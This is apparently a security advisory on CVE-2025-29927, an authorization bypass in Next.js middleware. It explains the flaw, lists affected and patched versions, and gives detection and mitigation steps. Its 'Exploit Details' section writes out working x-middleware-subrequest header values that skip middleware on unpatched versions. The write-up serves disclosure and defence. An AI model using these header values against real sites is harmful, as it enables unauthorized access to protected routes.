Next.js Middleware Exploit: CVE-2025-29927 Authorization Bypass
Summary
A critical vulnerability (CVE-2025-29927) in Next.js has been discovered that enables attackers to bypass middleware security controls through manipulation of the x-middleware-subrequest header. This vulnerability affects authentication, authorization, path rewriting, and security header implementations across multiple Next.js versions, from 11.1.4 through unpatched releases of v14.x and v15.x. It has received a CVSS score of 9.1, classifying it as a critical security risk.
Technical Background
Next.js middleware functions as an interceptor that executes before a request reaches its destination. It's commonly used to implement authentication checks, authorization controls, rewrite paths, redirect requests, and apply security headers. The middleware execution is managed by the runMiddleware function within Next.js.
The vulnerability exists in the internal mechanism designed to prevent infinite middleware recursion loops. As discovered by security researcher Rachid Allam (known as "zhero"), the execution of middleware can be controlled through manipulation of the x-middleware-subrequest header.
In older versions (pre-12.2), the middleware would check if this header's value contained the path to the middleware file. If it did, the middleware execution would be skipped entirely.
In more recent versions, the middleware implements a "MAX_RECURSION_DEPTH" check (set to 5) to prevent infinite loops. If the middleware path appears 5 or more times in the header value (separated by colons), the middleware execution is skipped. This mechanism, intended for internal use, can be exploited by external requests.
The critical security flaw is that this internal protection mechanism accepts and processes the header from any incoming request, including those from external sources, without validation. This allows attackers to craft requests that deliberately bypass middleware security controls.
Exploit Details
The exploit works by including a specially crafted x-middleware-subrequest header in HTTP requests:
For older versions (pre-12.2):
x-middleware-subrequest: pages/_middleware
For modern versions:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
If using the src directory structure:
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
Attack Vectors
This vulnerability enables several attack scenarios:
- 
Authentication Bypass: Attackers can access protected routes without requiring valid credentials or session tokens. 
- 
Content Security Policy (CSP) Bypass: If CSP headers are applied via middleware, this exploit can circumvent these protections, potentially enabling cross-site scripting (XSS) attacks. 
- 
Geographic Restrictions Bypass: Applications that use middleware to implement region-based content restrictions can have these controls bypassed. 
- 
Security Header Removal: Protective headers like HSTS, X-Frame-Options, or X-Content-Type-Options applied by middleware can be negated. 
- 
Cache Poisoning: Under certain configurations, bypassing a rewrite may lead to caching a 404 or 500 error (CPDoS attack). 
Affected Versions
- Next.js 11.1.4 to 12.3.4
- Next.js 13.0.0 to 13.5.8
- Next.js 14.0.0 to 14.2.24
- Next.js 15.0.0 to 15.2.2
According to the official GitHub Security Advisory, the following patched versions are available:
- Next.js 12.3.5
- Next.js 13.5.9
- Next.js 14.2.25
- Next.js 15.2.3
Users of all affected versions should update to the corresponding patched version or implement the recommended workaround if immediate updating is not possible.
Detecting Vulnerable Applications
To identify vulnerable applications, look for:
- The presence of x-powered-by: Next.jsin response headers (although this can be disabled)
- Headers like x-middleware-rewriteorx-nextjs-cache
- References to /_next/static/in response bodies
- Variations in response with and without the exploit header
Mitigation Strategies
Primary Recommendation: Update Immediately
- For Next.js 15.x: Update to ≥ 15.2.3
- For Next.js 14.x: Update to ≥ 14.2.25
- For Next.js 13.x: Update to ≥ 13.5.9
- For Next.js 12.x: Update to ≥ 12.3.5
Secondary Options:
If immediate updating is not possible, implement one of these mitigations:
- 
Block the Header at Web Server/Proxy Level: For Nginx: location / { proxy_set_header x-middleware-subrequest ""; }For Apache: RequestHeader unset x-middleware-subrequest
- 
Apply WAF Rules: If using Cloudflare or similar services, configure WAF rules to block requests containing the x-middleware-subrequestheader.
- 
Implement Defense-in-Depth: Add secondary authentication checks within route handlers or API endpoints as a backup to middleware controls. 
